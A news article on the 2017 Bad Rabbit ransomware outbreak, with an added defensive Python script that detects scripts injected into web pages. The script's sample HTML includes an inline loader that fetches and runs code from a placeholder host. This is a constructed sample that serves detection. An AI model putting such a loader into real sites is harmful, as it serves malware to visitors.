On Tuesday (October 24, 2017), a new ransomware attack dubbed Bad Rabbit hit the critical infrastructures of Eastern Europe: Ukraine’s Odessa International Airport, Kiev subway, and multiple Russian news agencies were affected by this data-encrypting malware.
While the primary targets of the cyber attack seem to be organizations in Russia and Ukraine, the ransomware has also infected computer systems in Turkey, Bulgaria, Germany, Japan and other nations, as reported by a security firm.
Bad Rabbit spreads through a drive-by download. Several popular websites were compromised by injecting JavaScript into their HTML body or into one of their .js files. Unlike earlier ransomware outbreaks that spread on their own, the initial infection needs the victim's cooperation: when a user visits a compromised site, a pop-up asking to update Flash Player appears and lures the user into downloading and running the malware.
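The practical check a site owner wants against the injection described above is a baseline comparison: which scripts does each page load, and has anything been added? The block below is an added example written for this page, not code from the original article or from any party it names. It assumes (my assumption, not the article's) that the owner keeps an allowlist of the script URLs a page legitimately loads, and it reports any other external script and any inline script for review. The sample HTML is constructed for the example, and the host `injected.invalid` is a placeholder, not an indicator from the real campaign.

```python
"""Added example, not code from the original article: flag <script> tags
that are not in a page's baseline, the kind of injection used to serve
the fake Flash update prompt.

Assumptions (mine, not the article's): the site owner keeps an allowlist
of the script URLs each page is supposed to load. The sample HTML below is
constructed; injected.invalid is a placeholder host, not a real indicator."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of <script src=...>
        self.inline = []     # bodies of <script> tags without src
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True

    def handle_data(self, data):
        # HTMLParser passes a <script> body to handle_data as raw text.
        if self._in_inline and data.strip():
            self.inline.append(data.strip())

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False


def find_unexpected_scripts(html, allowed_srcs):
    """Return scripts that are not in the page's baseline.

    Result dict:
      "external": script src values not in allowed_srcs, with their host
      "inline":   inline script bodies (the baseline allows none)
    """
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    unexpected = []
    for src in parser.external:
        if src in allowed_srcs:
            continue
        # A relative URL resolves to the site itself; it is still reported,
        # because an injected file dropped under the site's own path looks
        # exactly like that.
        host = urlparse(src).hostname or "(same-origin)"
        unexpected.append({"src": src, "host": host})
    return {"external": unexpected, "inline": parser.inline}


# Constructed sample page: two legitimate scripts plus an injected external
# script and an injected inline loader, the two placements the article names.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
</head><body>
<p>News</p>
<script src="https://injected.invalid/loader.js"></script>
<script>var s=document.createElement('script');s.src='https://injected.invalid/fp.js';document.body.appendChild(s);</script>
</body></html>"""

# Constructed baseline for the sample page.
BASELINE = {"/static/app.js", "https://cdn.example.net/lib.js"}

if __name__ == "__main__":
    report = find_unexpected_scripts(SAMPLE_HTML, BASELINE)
    for item in report["external"]:
        print("unexpected external script:", item["src"], "host:", item["host"])
    for body in report["inline"]:
        print("inline script:", body[:60])
```

Run this against a page fetched over HTTP (the way a visitor sees it, not the copy on disk), since injection into a served .js file or by an intermediary shows up only there; the same baseline idea extends to the contents of each allowed .js file by hashing them and comparing against a known-good hash.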
What happens next? Once the downloaded file is run, the computer is infected and its files are encrypted and inaccessible. The user is then directed to a page with a ransom message demanding 0.05 Bitcoin (approximately $275 at the time), to be paid within about 41 hours to regain access to the system and the encrypted files. When the time runs out, the ransom price goes up.
It is unclear who the creators of the Bad Rabbit ransomware are. The only thing known is that they are fans of Game of Thrones: as vigilant researchers noticed, the malware code contains references to Grey Worm and Daenerys' dragons, characters from the popular TV series.
Bad Rabbit shows some similarities to NotPetya, the ransomware-like attack that hit Windows computers in Europe and the US this summer. Both attacks were constructed using similar methods and target many of the same geographic regions.
However, as security researchers noted, unlike NotPetya and WannaCry, Bad Rabbit isn't built on EternalBlue, the Windows exploit leaked from the NSA (National Security Agency).
As malware researcher James Emery-Callcott told the BBC, the ransomware campaign is slowly dying down: “As far as I can see, the attacker’s server is no longer live and most of the infected sites hosting the script that gives the Flash update prompt.”
While the attackers' actual intentions are unknown, everyone affected is advised not to pay the ransom: there is no guarantee that paying will restore access to the encrypted data.
Bad Rabbit is the third massive ransomware outbreak this year, after WannaCry and NotPetya. It is a reminder to every Internet user to be cautious and never download and open unsolicited applications from Flash pop-ups, even if they claim to be a necessary update. A genuine Flash Player update comes from Adobe's own site or its built-in updater, never from a prompt on an unrelated website.